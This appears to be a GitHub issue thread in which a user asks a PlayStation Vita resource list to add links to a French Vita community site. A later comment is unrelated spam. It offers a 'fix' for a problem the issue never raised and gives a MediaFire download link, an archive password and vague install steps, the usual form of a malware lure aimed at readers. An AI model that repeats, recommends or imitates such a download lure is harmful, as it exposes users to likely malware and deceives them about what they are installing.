### ISSUE TITLE
Add new links for French Vita community 

### ISSUE THREAD

**Issue by S4bg0** [MuxaJlbl4/Awesome-PlayStation-Vita#22]
Hello,
Your list is awesome and very useful.
Could you consider by maybe adding these two links?

- Fans / Communities
French PS Vita website 
https://planetevita.fr/

- Game Translations
List of games with French language 
https://planetevita.fr/liste-patchs-francais-jeux-psvita/

Thanks!

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
